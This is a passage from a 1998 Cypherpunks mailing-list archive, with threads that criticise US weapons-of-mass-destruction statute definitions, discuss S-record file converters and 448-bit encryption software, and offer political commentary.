those terms are defined in section 178) -

   (2) against any person within the United States, and the
  results of such use affect interstate or foreign commerce or, in
  the case of a threat, attempt, or conspiracy, would have affected
  interstate or foreign commerce;

----------

 (c) Definitions. - For purposes of this section -

   (2) the term ''weapon of mass destruction'' means -

      (A) any destructive device as defined in section 921 of this
     title;

      (B) any weapon that is designed or intended to cause death or
     serious bodily injury through the release, dissemination, or
     impact of toxic or poisonous chemicals, or their precursors;

      (C) any weapon involving a disease organism; or

      (D) any weapon that is designed to release radiation or
     radioactivity at a level dangerous to human life.

----------

CHAPTER 10 - BIOLOGICAL WEAPONS
Sec. 178. Definitions

  As used in this chapter -

    (1) the term ''biological agent'' means any micro-organism,
  virus, infectious substance, or biological product that may be
  engineered as a result of biotechnology, or any naturally
  occurring or bioengineered component of any such microorganism,
  virus, infectious substance, or biological product, capable of
  causing -

      (A) death, disease, or other biological malfunction in a
    human, an animal, a plant, or another living organism;

      (B) deterioration of food, water, equipment, supplies, or
    material of any kind; or

      (C) deleterious alteration of the environment;

    (2) the term ''toxin'' means the toxic material of plants,
  animals, microorganisms, viruses, fungi, or infectious
  substances, or a recombinant molecule, whatever its origin or
  method of production, including -

      (A) any poisonous substance or biological product that may be
    engineered as a result of biotechnology produced by a living
    organism; or

      (B) any poisonous isomer or biological product, homolog, or
    derivative of such a substance;

    (3) the term ''delivery system'' means -

      (A) any apparatus, equipment, device, or means of delivery
    specifically designed to deliver or disseminate a biological
    agent, toxin, or vector; or

      (B) any vector;

    (4) the term ''vector'' means a living organism, or molecule,
  including a recombinant molecule, or biological product that may
  be engineered as a result of biotechnology, capable of carrying a
  biological agent or toxin to a host; and

    (5) the term ''national of the United States'' has the meaning
  prescribed in section 101(a)(22) of the Immigration and
  Nationality Act (8 U.S.C. 1101(a)(22)).

----------

Crime of 18 USC 2 not shown.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Tue, 3 Nov 1998 11:21:14 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: Bic-Assassins Convicted (fwd)
Message-ID: <199811030242.UAA02938@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Mon, 02 Nov 1998 20:41:24 -0500
> From: John Young <jya@pipeline.com>
> Subject: RE: Bic-Assassins Convicted (fwd)

> Jim Choate asked:
> 
> >If they had threatened just a plain old citizen with this 
> >email would they also be facing this life imprisonment?
> 
> Apparently the charges would have been the same if made 
> against any 
> 
>   "person within the United States, and the results of such 
>   use affect interstate or foreign commerce or, in the case 
>   of a threat, attempt, or conspiracy, would have affected 
>   interstate or foreign commerce." (see below)

Ok, exactly how would their threat effect inter-state commerce?

> The use of E-mail was incidental to the charges of both 
> conspiracy and threatening to use weapons of mass destruction:
> 
>   18:2332(a)(2) and (c)(2)(C). Conspiracy to use a weapon 
>   of mass destruction against person(s) w/in the U.S. 
>   the results of which affected interstate & foreign 
>   commerce.  Offense dates:  3/24/98 - 6/30/98.  Penalty:  
>   Any term of years or for life, $250,000, 5 yrs SRT.  (1)

Conspiracy requires active steps, not simply talking about it. As I
understand it the conspiracy and weapons of mass destructions charges were
given a not-guilty by the jury. No proof was presented that they had ever
even bought a bic lighter to test with. Hell, even going to the bookstore
and buying a book or the library and checking one out is protected under the
Constitution. It takes more than talk to generate a conspiracy.

>   18:2332a(a)(2) and (c)(2)(C) and 2.  Threatening to use a
>   weapon of mass destruction. Offense date:  6/26/98
>   Penalty:  any term of years or Proceedings include all events.
>   for life, $250,000, 5 yrs SRT as to ea ct. (2 - 8)

If we're going to go by this then the US government is already guilty re
their plan to destroy various contraband plants via genetic weapons. If you
think that won't effect inter-state & international commerce you better
think again.

And they've gone a lot farther than just talking about it in email. Congress
has spent millions on it over the last few years.

> The eight counts are for the one count of conspiracy and
> threats against seven federal agencies ("employees and
> families"):
> 
>   The President
>   ATF
>   FBI
>   DEA
>   IRS
>   Secret Service
>   Custom Service

Ok, so my question still stands what if these had been actual people instead
of government agencies? The charges are *NOT* for threatening individuals
who happen to be government agents, oh no, they're for threatening
government *agencies* a whole different ball game ('The President' is an
office not a person).

> CHAPTER 113B - TERRORISM
> 
> Sec. 2332a. Use of weapons of mass destruction
> 
>  (a) Offense Against a National of the United States or Within the
> United States. - A person who, without lawful authority, uses,
> threatens, or attempts or conspires to use, a weapon of mass
> destruction, including any biological agent, toxin, or vector (as
> those terms are defined in section 178) -

Where is 'lawful authority' defined?

>    (2) against any person within the United States, and the
>   results of such use affect interstate or foreign commerce or, in
>   the case of a threat, attempt, or conspiracy, would have affected
>   interstate or foreign commerce;

I covered this one already.

>  (c) Definitions. - For purposes of this section -
> 
>    (2) the term ''weapon of mass destruction'' means -
> 
>       (A) any destructive device as defined in section 921 of this
>      title;
> 
>       (B) any weapon that is designed or intended to cause death or
>      serious bodily injury through the release, dissemination, or
>      impact of toxic or poisonous chemicals, or their precursors;
> 
>       (C) any weapon involving a disease organism; or

So if I go out and sneeze on somebody I've committed an attack using a
weapon of mass destruction?

>       (D) any weapon that is designed to release radiation or
>      radioactivity at a level dangerous to human life.

Where is the definition of 'mass' in there? Hell, just about anything
qualifies under this definition. It doesn't even require the death of 1
single individual (it doesn't even require it to be lethal).

Oh, *all* radiation is harmful to human life.

> CHAPTER 10 - BIOLOGICAL WEAPONS
> Sec. 178. Definitions
> 
>   As used in this chapter -
> 
>     (1) the term ''biological agent'' means any micro-organism,
>   virus, infectious substance, or biological product that may be
>   engineered as a result of biotechnology, or any naturally
>   occurring or bioengineered component of any such microorganism,
>   virus, infectious substance, or biological product, capable of
>   causing -
> 
>       (A) death, disease, or other biological malfunction in a
>     human, an animal, a plant, or another living organism;

Well this certainly covers each and every effect of a pathogen on a
biological system (I particularly like the way they've covered their butts
for ET.... 'another living organism'. Not to mention that cleaning your
kitchen counter qualifies under this statute.

>       (B) deterioration of food, water, equipment, supplies, or
>     material of any kind; or
> 
>       (C) deleterious alteration of the environment;

Well at least they've set themselves up for their anti-drug pathogen
program.

>     (2) the term ''toxin'' means the toxic material of plants,

Can you say circular defintion, I thought you could. This sentence say
nothing.

>   animals, microorganisms, viruses, fungi, or infectious
>   substances, or a recombinant molecule, whatever its origin or
>   method of production, including -
> 
>       (A) any poisonous substance or biological product that may be
>     engineered as a result of biotechnology produced by a living
>     organism; or
> 
>       (B) any poisonous isomer or biological product, homolog, or
>     derivative of such a substance;

This of course happens to cover plain old water (re 'whatever its origin or
method of preduction').

>     (3) the term ''delivery system'' means -
> 
>       (A) any apparatus, equipment, device, or means of delivery
>     specifically designed to deliver or disseminate a biological
>     agent, toxin, or vector; or
> 
>       (B) any vector;
> 
>     (4) the term ''vector'' means a living organism, or molecule,
>   including a recombinant molecule, or biological product that may
>   be engineered as a result of biotechnology, capable of carrying a
>   biological agent or toxin to a host; and

Next time I get food-poisoning at a restaraunt it's comforting to know that
the federal government will be right there to prosecute under this
particular statute...

Geesh.


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Tue, 3 Nov 1998 11:25:35 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: s-format file converter? (fwd)
Message-ID: <199811030250.UAA03074@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From: "Lucky Green" <shamrock@netcom.com>
> Subject: s-format file converter?
> Date: Mon, 2 Nov 1998 18:52:11 -0800

> I need to convert some files stored in Motorola s-format (widely used for
> input into EPROM burners) to a binary blob of data my debugger can read. I
> know there is a GNU utility that supports converting to and from s-format
> and a wide variety of other file formats, but a web search turned up empty.
> 
> If you know where to find such a utility for UNIX, please let me know.

Geesh. If you know it's GNU then it makes some sense to check gnu.org now
wouldn't it?

You might also want to check out the 'frankenstein' set of cross-assemblers
as they handle a wide variety of targets and file formats.


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Tue, 3 Nov 1998 11:43:31 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: CJ & a potential out...
Message-ID: <199811030301.VAA03145@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



It occurs to me that since the court saw fit to assign an attorney over CJ's
objection he may have constitutional grounds to have his arrest and the
consequential proceedings overturned.

The Constitution says that a person has a right to counsil if the issue at
hand is worth more than $20. It doesn't say the court must appoint one and
it most certainly doesn't say a defendent requires one. Since the
Constitution leaves the issue up to the defendant any action that is
contrary to their desires is un-constitutional. The 10th prohibits
these sorts of excess or self-appointed authority.


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: DOOM Anonymous Untraceable User <nobody@seclab.com>
Date: Tue, 3 Nov 1998 05:05:28 +0800
To: cypherpunks@cyberpass.net
Subject: Seeking CDSA source code reference implementation
Message-ID: <199811022025.VAA06813@rogue.seclab.com>
MIME-Version: 1.0
Content-Type: text/plain



I am searching for a source code reference implementation of the CDSA V2.0 standard
as published by the Open Group. I know that a freely available implementation has been
released by IBM (MIT Jonah PKIX Freeware, can be downloaded from http://web.mit.edu/pfl) 
but this is legally accessible only for US citizen.

I have tried to spot the CDSA source but have not found anything up to now.

Has this software found its way outside the US yet? I'd like to put my fingers on it
without actually breaking fed laws... 


Thanx.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Tue, 3 Nov 1998 13:52:53 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: A Motorola site w/ potentialy relevant info (S-Records)
Message-ID: <199811030510.XAA03557@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> X-within-URL: http://www.mcu.motsps.com/freeweb/amcu_ndx.html

>    as-080.dp 43197 Mar 30 94 Understanding S-Records & Downloading

>    XASMHC11.MAC 49024 Mar 30 94 This is the Motorola Free cross-
>    assembler ported to the Mac by Georgia Tech. Use MacBinary to download
>    this Macintosh application. [Uploaded by Jim Sibigtroth.]

>    AN1060Q.BAS> 8083 Mar 30 94 This is the BASIC source code for AN1060.
>    This program allows S-records to be downloaded & programmed into a
>    M68HC711E9 EPROM/MCU (OTP also). This program was written in
>    QuickBasic and works with a MAC or a PC. [Uploaded by Jim Sibigtroth.]

>    as32v1-2.zip 52176 Mar 30 94 Latest rev. of CPU32 Freeware assembler
>    for PC. Minor bug fixes. Now generates symbol table for BD32
>    background mode debugger.

>    asembler.arc 42839 Mar 30 94 source files for cross assemblers and
>    doc.

>    as0.c 214 Mar 30 94 --+ source code for assemblers:

>    eval.c 4089 Mar 30 94 | source code common to all assemblers

>    downld.doc 1417 Mar 30 94 1.2 Downloading S-Records Hints (RCV cmd)

>    downldpc.doc 20075 Mar 30 94 1.4 Download S-Recs w/IBM-PC,
>    Kermit/ProComm

>    libsrc11.arc 35692 Mar 30 94 n/a M68HC11 Cross C Compiler Library
>    Source The above.archive file contains all the library source files
>    for the HC11 Cross C Compiler (MS-DOS and System V).

>    sack.sa 651 Mar 30 94 1.1 S-Record Acknowledge Program (Pascal)


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Tue, 3 Nov 1998 13:51:11 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Frankenstein should be avail. for Unix (S-Records)
Message-ID: <199811030512.XAA03612@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> X-within-URL: http://vanbc.wimsey.com/~danf/cbm/cross-development.html

>    $ Cross-32 V2.0 Meta Assembler [DOS] (Universal Cross-Assemblers)
>           Table-based absolute macro cross assembler using manufacturer's
>           assembly mnemonics. Supports macros and conditional assembly.
>           Uses C language arithmetic and logical operators. Includes
>           tables for 6502, 65C02, 65816 and >40 other CPUs and can be
>           expanded to even more. Generates Intel hex, Motorola S hex and
>           binary output. Expensive (~$200).
>           On-line program information is available.
>           On-line program information is available.
>           <http://www.datasynceng.com/c32demo.zip> (demo version)

>    Frankenstein Cross Assemblers [source,DOS,UNIX] (1990, Mark Zenier)
>           No macros, relocatable linkers, fancy print controls or
>           structured control statments. Source code in Yacc and C
>           included. Executables are called as6502, as65c00 and asr65c00.
>           On-line program information is available.
>           On-line program information is available.
>           Available from the C Users' Group Library, disk #335.
>           <ftp://ftp.sterling.com/usenet/alt.sources/volume90/Dec/
>           901206.02/3/4, 901209.07/8>
>           <ftp://ftp.njit.edu/pub/msdos/frankasm/frankasm.zoo>


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Tue, 3 Nov 1998 16:15:23 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: Bic-Assassins Convicted (fwd)
In-Reply-To: <199811030242.UAA02938@einstein.ssz.com>
Message-ID: <3.0.5.32.19981102233532.008b2d80@idiom.com>
MIME-Version: 1.0
Content-Type: text/plain



At 08:42 PM 11/2/98 -0600, Jim Choate wrote, though not in this order:
>>  (c) Definitions. - For purposes of this section -
>>    (2) the term ''weapon of mass destruction'' means - [...]
>>       (B) any weapon that is designed or intended to cause death or
>>      serious bodily injury through the release, dissemination, or
>>      impact of toxic or poisonous chemicals, or their precursors;
>>       (C) any weapon involving a disease organism; or
...
>Where is the definition of 'mass' in there? Hell, just about anything
>qualifies under this definition. It doesn't even require the death of 1
>single individual (it doesn't even require it to be lethal).

My reading is the same as yours -
the law was written carelessly, and wrong (unless JYA forgot the paragraph defining
"mass" as "intended to kill more than N people", but it doesn't look like it.)
That means that any chemical weapon, including your can of mace or pepper spray,
that might be construed as causing "serious bodily injury",
makes you a terrorist using weapons of mass destruction.
Might get worse - lead _is_ toxic, and causes injury by impact.
It's a bad law, and it's going to be abused, and this case is 
a great one for the Feds to use to set bad precedent with,
since the Republic of Texas are a bunch of incompetent wackos.

>> CHAPTER 113B - TERRORISM
>> Sec. 2332a. Use of weapons of mass destruction
>>  (a) Offense Against a National of the United States or Within the
>> United States. - A person who, without lawful authority, uses,
>> threatens, or attempts or conspires to use, a weapon of mass
>> destruction, including any biological agent, toxin, or vector (as
>> those terms are defined in section 178) -
>
>Where is 'lawful authority' defined?

Not sure, but it means that the Feds aren't terrorists if _they_
threaten or conspire to use weapons of mass destruction,
but you would be if you did.  It also probably means that 
foreign governments aren't covered here, but foreign NGOs are,
e.g. the IRA.

>> interstate commerce
The standard clause used to give the Feds jurisdiction over things;
given Roosevelt-era courts deciding that a farmer feeding his own grain
to his own hogs affects interstate commerce, surely email or the
World Wide Web counts as interstate, as does killing anybody
who might cross state lines or buy some product that does.
(Of course, given the number of politicians who are for sale,
removing a few of them from the market can pretty legitimately
be called affecting interstate commerce :-)



				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Narayan Raghu <narry@geocities.com>
Date: Tue, 3 Nov 1998 18:56:47 +0800
To: Robert Hettinga <rah@shipwright.com>
Subject: new 448 bit key by Indian firm
In-Reply-To: <v04020a0ab263d0da7260@[139.167.130.246]>
Message-ID: <363E2E8F.EE570559@geocities.com>
MIME-Version: 1.0
Content-Type: text/plain



Hello, 

Sorry for any cross-posting.
Just thought this group would be interested in this new s/w.
The most startling thing about it is the price Rs. 1,650. (approx US$
40) per copy ...

I'll be at the Bangalore IT fair morrow, and will try to give a first
hand update of this stuff after meeting with the reps. 

http://www.timesofindia.com/031198/03mban19.htm

            Indian firm unveils 448-bit encryption
            package 
	    It is called EMD Armor -- an award-winning
            encryption software package using a powerful 448-bit key,
            developed by an Indian company. It beats the United
States 	    at its
            own game, for, even today, US companies are not allowed to
            export encryption software that uses keys higher than
128             bits.

-- snip ----

	    EMD Armor, which is used to secure your personal computer,
            also goes by the name of Sigma 2000. It has picked up the
            Editors Choice award. The product range covers security for
            PCs, e-mail, networks. `Our product combines the highest key
            strength, fast encryption speed (60 MB per minute), and 	   
online
            encryption. That means non-encyrpted data is never stored on
            your hard disk. Anything that is there is
encrypted. 	                Complete  security,'' says Kundu.

-- snip -- 
	    K. Kundu, Signitron India Director, an IIT Kharagpur alumni,
            told The Times of India that the key algorithm they
have 	    used is
            `Blowfish', developed by cryptography guru Bruce Schneir.



regards,
narry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: totaltel@total.emap.com
Date: Tue, 3 Nov 1998 11:43:46 +0800
To: cypherpunks@toad.com
Subject: ITU In Knots Over Accounting Rates
Message-ID: <98Nov3.035048gmt.28558@ebc-fw-01.emap.com>
MIME-Version: 1.0
Content-Type: text/plain



Welcome to the Total Telecom news update.

http://www.totaltele.com

-------------------------------------

today's top story:-

ITU In Knots Over Accounting Rates

Developed and developing countries were in a deadlock over how to reform the international accounting rate system at the International Telecommunication Union Plenipotentiary Conference in Minneapolis ....

http://www.totaltele.com/news/view.asp?ArticleID=20393&Pub=tt

*****************************************

Total Telecom - site update

As part of a larger effort to improve the service, we have moved Total Telecom to a new server and database over the weekend.  This should result in faster download times and improved searches for our readers.

However, as a result, a few readers may experience a few problems entering the site.  We apologize for any inconvenience.  Please email us if you are experiencing any difficulties.

webmaster@total.emap.com

*****************************************

current Total Telecom headlines include.....

Cegetel Subdued by Slow Uptake and ART's Ruling

Cegetel Entreprises, the corporate user division of France's second telecoms operator, is braced for heavy losses this year due to slower than expected customer uptake and France Telecom's aggressive ........

http://www.totaltele.com/news/view.asp?ArticleID=20394&Pub=tt
------------------

Pay-Per-Slot Likely for Satellite Reform

The International Telecommunication Union Plenipotentiary conference in Minneapolis will this week hear a proposal to break a 10-nation stranglehold on world satellite systems. Under the plan, still ......

http://www.totaltele.com/news/view.asp?ArticleID=20397&Pub=tt
----------------

First Pacific in Talks to Buy More PLDT Shares

First Pacific Co. said it bought a "strategic stake" in Philippine Long Distance Telephone Co. and may buy more, transactions that will cost at least $724 million. First Pacific, a Hong Kong-based in 

http://www.totaltele.com/news/view.asp?ArticleID=20396&Pub=tt

---------------

France Telecom to Sell 15% Stake of Greece's Panafon in IPO

Panafon SA, Greece's largest mobile phone company, said France Telecom SA will sell a 15% stake in the company through an initial public offering that may raise as much as $600 million. Panafon, 55%-......
 
http://www.totaltele.com/news/view.asp?ArticleID=20395&Pub=tt

----------------

plus

NTT President Apologizes for Service Break in Osaka

Diax Mobile Phone Services May Not Start Until February

Iridium to Begin Satellite-Phone Network Sunday 

AsiaSat Owners Discuss Reshuffle of Holdings: C&W May Exit

Deutsche Telekom Hit by New Price War

ITU Plenipot 98 Plays Paper Satellite Ping-Pong

US Bids for Internet Domain Name Control

.....go to the front page for the full list of headlines

http://www.totaltele.com

********************************************

If you wish to be removed from future mailings, please reply 
with "Remove" in the subject line and we will automatically block you from this list.

Thank you for reading Total Telecom





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@cypherpunks.to>
Date: Tue, 3 Nov 1998 12:17:39 +0800
To: Jim Choate <ravage@EINSTEIN.ssz.com>
Subject: Re: s-format file converter? (fwd)
In-Reply-To: <199811030250.UAA03074@einstein.ssz.com>
Message-ID: <Pine.BSF.3.96.981103043408.20525A-100000@pakastelohi.cypherpunks.to>
MIME-Version: 1.0
Content-Type: text/plain



On Mon, 2 Nov 1998, Jim Choate wrote:

> 
> Forwarded message:
> 
> > From: "Lucky Green" <shamrock@netcom.com>
> > Subject: s-format file converter?
> > Date: Mon, 2 Nov 1998 18:52:11 -0800
> 
> > I need to convert some files stored in Motorola s-format (widely used for
> > input into EPROM burners) to a binary blob of data my debugger can read. I
> > know there is a GNU utility that supports converting to and from s-format
> > and a wide variety of other file formats, but a web search turned up empty.
> > 
> > If you know where to find such a utility for UNIX, please let me know.
> 
> Geesh. If you know it's GNU then it makes some sense to check gnu.org now
> wouldn't it?

Which is of course what I did before sending my inquiry to the list. Nada.
 
> You might also want to check out the 'frankenstein' set of cross-assemblers
> as they handle a wide variety of targets and file formats.

Hmm, I can find them only for MSDOS. Do you have a pointer to a UNIX
version?

Thanks,

-- Lucky Green <shamrock@cypherpunks.to> PGP v5 encrypted email preferred.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Tue, 3 Nov 1998 14:18:23 +0800
To: cypherpunks@cyberpass.net
Subject: instruments of liberation (continuing 'fear' thread)
Message-ID: <199811030549.GAA22305@replay.com>
MIME-Version: 1.0
Content-Type: text/plain




At 11:22 PM 11/1/98 -0800, Tim May wrote:
>"Wired News" carried an article reporting on a plan to  (somehow) spread


Wired recently had pix/columns on Rivest and Schneier.  This is 
how crypto will get into the popmind: through sophisticated deadtrees like
this read by propeller heads *and* suits.  The Cryptos talk of
the economy, of keeping crackers out, of personal privacy.  The
list of good uses will grow.  

The Fascistas will be stuck with only their dealers and the 
vaporrists, vapornappers, vaporophiles they will continue
to worship.

Eventually, the Sheeple will grok what's being argued over.
The rest depends on your optimism level.


--Wasted Hellions Trace my Bugs








  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Tue, 3 Nov 1998 21:57:10 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: Bic-Assassins Convicted (fwd)
Message-ID: <199811031315.HAA04306@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Mon, 02 Nov 1998 23:35:32 -0800
> From: Bill Stewart <bill.stewart@pobox.com>
> Subject: RE: Bic-Assassins Convicted (fwd)

> >Where is 'lawful authority' defined?
> 
> Not sure, but it means that the Feds aren't terrorists if _they_
> threaten or conspire to use weapons of mass destruction,
> but you would be if you did.  It also probably means that 
> foreign governments aren't covered here, but foreign NGOs are,
> e.g. the IRA.

That's truly funny....

"We the people in order to form a more perfect union...."

How does the federal government gain priviliges and immunities (ala 16th)
that aren't defined in the Constitution or an amendment? (see 9th and 10th)

> >> interstate commerce
> The standard clause used to give the Feds jurisdiction over things;
> given Roosevelt-era courts deciding that a farmer feeding his own grain
> to his own hogs affects interstate commerce, surely email or the
> World Wide Web counts as interstate, as does killing anybody
> who might cross state lines or buy some product that does.
> (Of course, given the number of politicians who are for sale,
> removing a few of them from the market can pretty legitimately
> be called affecting interstate commerce :-)

Read the last sentence of the rubber-clause.....any action or law that
derives from it is required to respect the remainder of the Constitution in
full (simply crossing a state border doesn't annul the Constitution). Since
that includes the 9th and 10th (in toto) they have themselves a quandry.

Personaly, I would trust an individual handling these technologies before
I'd trust a bunch of power-happy gun-toting morons acting in concert who's
answer to everything is "my boss told me to do it" and willingly deny their
duties as individual citizens in order to play their three-initial games.

I saw a comment the other day that the government (those who support these
world views I suppose) doesn't trust the people. I wonder why after reading
laws that are this poorly constructed. Whatever the hell the intent was it
wasn't to protect life, liberty, and the pursuit of happiness.



    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Tue, 3 Nov 1998 22:13:44 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: VANGUARD:  An Election About Nothing? (fwd)
Message-ID: <199811031321.HAA04373@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Subject: VANGUARD:  An Election About Nothing?
> Date: Tue, 3 Nov 98 00:35:09 -0600
> From: Vanguard <Vanguard@theVanguard.org>

> 
>                       AN ELECTION ABOUT NOTHING?
>                            30 October 1998 
> 
>                     Copyright 1998, Rod D. Martin 
> 
>                    "The Vanguard of the Revolution"
>                            National Edition 

> An election is at hand, and yet again, the vast majority will not
> vote.  Just as they have shown a complete disinterest in the
> character of the President, they will Tuesday show a total lack of
> concern for the fate of their country.  For them, this is the
> Seinfeld election:  an election about nothing.
> 
> It is just as well that such nincompoops won't vote; and yet it is
> a sorry commentary on the state of our body politic that so few
> understand, that so few even care.  Another fatal disaster just
> this month, this time in Taft, California, shows us again just why
> it is so tragic.

Perhaps they're not stupid. Perhaps their not nin-compoops, but rather you are
for assigning any value to the entire process.

It is a standard litany of conventional science to choose the lesser of two
evils. Perhaps the lesser of two evils in this corrupted, Constitutionaly
bereft system is *NOT TO PARTICIPATE*. Sine it obviously doesn't matter who
wins, since the mighty spectre of compromise will dilute any real difference
into a verbal shell game devoid of meaning. Maby deToquville (sorry for
spelling - early morning) was right about mediocrity being the result of
democracy, except in one fine point. It won't be the people as a whole but
rather those who are too stupid and wedded to outmoded ideals to change. The
social and political dinosaurs if you will.

Maby the polls where drunk dwarves win over 'serious' candidates is actualy
demonstrating the absurdity of those who insist their issue are serious.
Perhaps people are finaly seeing that these nin-compoops who want the
political power in this country are simply blind to a social and economic
change in the winds.


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 3 Nov 1998 21:56:17 +0800
To: Michael Motyka <cypherpunks@cyberpass.net
Subject: Re: dbts: Lions and TEMPESTs and Black Helicopters (Oh, My!)
In-Reply-To: <363E80C1.4084@lsil.com>
Message-ID: <v04020a15b264af18b1aa@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain



At 11:04 PM -0500 on 11/2/98, Michael Motyka lobs a low, slow one, over the
plate:


> These unregulated virtual economies need to conduct trade with
> ActualPhysicalSpace.

Oh. That's easy. Check out the essay section of <http://www.philodox.com/>
for a good prima facie underwriting model for digital bearer instruments,
expecially the model map.

Render unto FinCEN. No problem. Flatland can't reach the sky no matter how
hard they try. (hey. I'm rapping... pbbbt. tht. pbbbt. pbbbt. tht... :-))


Cheers,
Bob

-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@Algebra.COM (Igor Chudov @ home)
Date: Tue, 3 Nov 1998 23:29:20 +0800
To: franl@world.std.com
Subject: Re: Is CP mail to me bouncing?
In-Reply-To: <36421188.327490806@roadrunner.pictel.com>
Message-ID: <199811031447.IAA15402@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text



Francis Litterio wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> 
> In the last few days I've ceased receiving CP email from algebra.com. 
> Am I still subscribed?  Is mail to me bouncing back to you?  My ISP
> has some aggressive anti-spam measures that sometimes bounce mail from
> lists.

Yes, your problems in receiving cypherpunks mail are due to your ISP.

Please change your ISP, as the current one cares more about the antispam
crusade than about their customers receiving email.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Murray <ericm@lne.com>
Date: Wed, 4 Nov 1998 01:55:43 +0800
To: ravage@einstein.ssz.com
Subject: Re: VANGUARD:  An Election About Nothing? (fwd)
In-Reply-To: <199811031321.HAA04373@einstein.ssz.com>
Message-ID: <199811031700.JAA18950@slack.lne.com>
MIME-Version: 1.0
Content-Type: text/plain



Jim Choate writes:
 
 
> It is a standard litany of conventional science to choose the lesser of two
